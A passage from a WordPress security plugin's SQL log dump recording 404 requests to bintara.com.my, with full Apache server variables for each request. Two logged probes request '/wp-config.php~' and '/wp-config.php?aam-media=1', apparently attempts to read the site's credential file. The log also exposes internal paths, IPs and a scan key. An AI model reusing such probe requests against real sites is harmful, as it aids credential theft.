;s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZMydg1@FMe1KrdqPAPQwgAAAAQ\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"38868\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZMydg1@FMe1KrdqPAPQwgAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569928709.6565\";s:12:\"REQUEST_TIME\";s:10:\"1569928709\";}}','notice','2019-10-01 11:18:58','2019-10-01 11:18:33',35215432,35468184,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569927798.6199529170989990234375',1,0,'103.6.198.69'),(27403,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"201.219.197.138\";s:11:\"REMOTE_PORT\";s:5:\"46566\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZNJq5hTzEdyYDEAlqV1YQAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569933739.3647\";s:12:\"REQUEST_TIME\";s:10:\"1569933739\";}}','notice','2019-10-01 12:42:24','2019-10-01 12:42:20',35531056,37335896,'https://bintara.com.my/?page_id=18',1,0,'201.219.197.138'),(27404,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/teamviewer-2/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZN0nJhTzEdyYDEAlqWLmAAAAIs\";s:12:\"REDIRECT_URL\";s:14:\"/teamviewer-2/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.239\";s:11:\"REMOTE_PORT\";s:5:\"14495\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:10:\"SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZN0nJhTzEdyYDEAlqWLmAAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569944732.5172\";s:12:\"REQUEST_TIME\";s:10:\"1569944732\";}}','notice','2019-10-01 15:45:34','2019-10-01 15:45:32',34065360,35875440,'https://bintara.com.my/teamviewer-2/',1,0,'157.55.39.239'),(27405,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:78:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=324f903b42f7b05d8a0d788eb0345cfc\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:51:\"End of script output before headers: admin-ajax.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:91:\"action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=324f903b42f7b05d8a0d788eb0345cfc\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"50258\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=324f903b42f7b05d8a0d788eb0345cfc\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:64:\"/home/norfaiz/public_html/bintara.com.my/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:24:\"/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZN7qQ1@FMe1KrdqPAPmiAAAAA4\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZN7qQ1@FMe1KrdqPAPmiAAAAA4\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"50258\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZN7qQ1@FMe1KrdqPAPmiAAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569946559.5763\";s:12:\"REQUEST_TIME\";s:10:\"1569946559\";}}','notice','2019-10-01 16:16:04','2019-10-01 16:16:00',35286128,35539072,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=324f903b42f7b05d8a0d788eb0345cfc',1,0,'103.6.198.69'),(27406,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOHHZhTzEdyYDEAlqWVbwAAAIk\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"33080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOHHZhTzEdyYDEAlqWVbwAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569949469.6089\";s:12:\"REQUEST_TIME\";s:10:\"1569949469\";}}','notice','2019-10-01 17:04:32','2019-10-01 17:04:30',35135976,36941448,'https://bintara.com.my/2',1,0,'104.131.155.126'),(27407,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOHJphTzEdyYDEAlqWVdgAAAJM\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"34741\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOHJphTzEdyYDEAlqWVdgAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569949478.2604\";s:12:\"REQUEST_TIME\";s:10:\"1569949478\";}}','notice','2019-10-01 17:04:43','2019-10-01 17:04:38',35146360,36952128,'https://bintara.com.my/3',1,0,'104.131.155.126'),(27408,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZOIcJhTzEdyYDEAlqWXLwAAAIY\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOIcJhTzEdyYDEAlqWXLwAAAIY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"59047\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOIcJhTzEdyYDEAlqWXLwAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569949808.2364\";s:12:\"REQUEST_TIME\";s:10:\"1569949808\";}}','notice','2019-10-01 17:10:10','2019-10-01 17:10:08',35186512,36994616,'https://bintara.com.my/wp-config.php~',1,0,'104.131.155.126'),(27409,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZOIczU8kVzmT4VXgrERQwAAARg\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOIczU8kVzmT4VXgrERQwAAARg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"59704\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOIczU8kVzmT4VXgrERQwAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569949814.5183\";s:12:\"REQUEST_TIME\";s:10:\"1569949814\";}}','notice','2019-10-01 17:10:18','2019-10-01 17:10:15',35187992,36987440,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'104.131.155.126'),(27410,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/2\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) 